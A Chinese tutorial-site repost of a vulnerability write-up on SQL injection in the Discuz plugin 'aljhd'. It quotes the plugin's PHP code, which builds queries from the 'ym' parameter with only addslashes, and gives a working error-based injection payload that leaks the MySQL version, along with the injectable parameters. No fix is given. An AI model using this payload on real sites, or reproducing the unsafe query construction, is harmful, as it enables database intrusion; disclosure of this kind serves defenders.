一聚教程网:一个值得你收藏的教程网站

ps教程| flash教程| 路由器设置| Jsp教程| 加入收藏

PHP教程 Css教程 操作系统 数据库 安卓下载

首页 游戏下载 软件下载 专题 资讯教程 php教程 asp.net教程 css教程 网页制作 网页特效 手机开发 办公数码
+ -
当前位置:一聚教程网 > 网页制作 > CMS技巧

推荐专题

最新下载

热门教程

Discuz某插件sql注射漏洞

时间:2022-06-25 16:27:52 编辑:袖梨 来源:一聚教程网

Author:Saline
Email:[email protected]

文件source/plugin/aljhd/aljhd.inc.php122行附近

 代码如下 复制代码

}else{
    $ymlist=C::t('#aljhd#alj_hd')->fetch_all_by_ym();
    $typelist=C::t('#aljhd#alj_hd')->fetch_all_by_type();
     
    $currpage=$_GET['page']?$_GET['page']:1;
    $perpage=$config['page'];
    $num=C::t('#aljhd#alj_hd')->count_by_ym_type_status($_GET['ym'],$_GET['type'],$_GET['status']);
    $start=($currpage-1)*$perpage;
    $hdlist=C::t('#aljhd#alj_hd')->fetch_all_by_ym_type_status($_GET['ym'],$_GET['type'],$_GET['status'],$start,$perpage);
    $paging = helper_page :: multi($num, $perpage, $currpage, 'plugin.php?id=aljhd&ym='.$_GET['ym'].'&type='.$_GET['type'].'&status='.$_GET['status'], 0, 11, false, false);
     
    include template('aljhd:index');
}

然后其中的fetch_all_by_ym fetch_all_by_type fetch_all_by_ym_type_status count_by_ym_type_status几个函数在
文件source/plugin/aljhd/table/table_alj_hd.php中找到了

 代码如下 复制代码

class table_alj_hd extends discuz_table
{
    public function __construct() {
 
        $this->_table = 'alj_hd';
        $this->_pk    = 'id';
 
        parent::__construct();
    }
    public function count_by_ym_type_status($ym,$type,$status){
        $where=' where 1';
        if($ym){
            $where.=' and ym='.addslashes($ym); //对$ym进行了addslashes转换
        }
        .......
        return DB::result_first('select count(*) from %t '.$where,array($this->_table));
    }
    public function fetch_all_by_ym_type_status($ym,$type,$status,$start,$perpage){
        $where=' where 1';
        if($ym){
            $where.=" and ym='".addslashes($ym)."'";//对$ym进行了addslashes转换
        }
         
        $where.=' order by endtime desc';
        if($perpage){
            $where.=" limit $start,$perpage";
        }
         //拼接出来的语句就是 select count(*) from alj_hd where 1 and  ym='.addslashes($ym) and type='.intval($type) and starttime<='.TIMESTAMP.' and endtime>='.TIMESTAMP;
        return DB::fetch_all('select * from %t '.$where,array($this->_table));
    }
    public function fetch_all_by_ym(){
        return DB::fetch_all('select ym,count(*) num from %t group by ym order by ym desc',array($this->_table));
    }
    public function fetch_all_by_type(){
        return DB::fetch_all('select type,count(*) num from %t group by type',array($this->_table));
    }
}

发现对其中的ym仅仅是做了addslashes处理,我们知道的addslashes编码仅仅是在gbk下才有作用,所有整个显得鸡肋

 代码如下 复制代码

select count(*) from alj_hd where 1 and ym=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and type=1
 
result:
 
(1062) Duplicate entry '5.5.29-log1' for key 'group_key'

测试

word-spacing: 0px; -webkit-text-size-adjust: auto; -webkit-text-stroke-">可注入参数imes,ljtype,m,orderby,page,telid

贴一个ljtype的
随便找一个
 
 Discuz某插件sql注射漏洞
 
POST测试一下
 
 
Discuz某插件sql注射漏洞
 
修复方案:

=-=~好多站都关了这个插件。。。

相关文章

热门栏目

一聚教程网| 关于我们| 联系我们| 广告合作| 友情链接| 版权声明

copyRight@2007-2022 www.111CN.NET AII Right Reserved

网站内容来自网络整理或网友投稿如有侵权行为请邮件:[email protected] 我们24小时内处理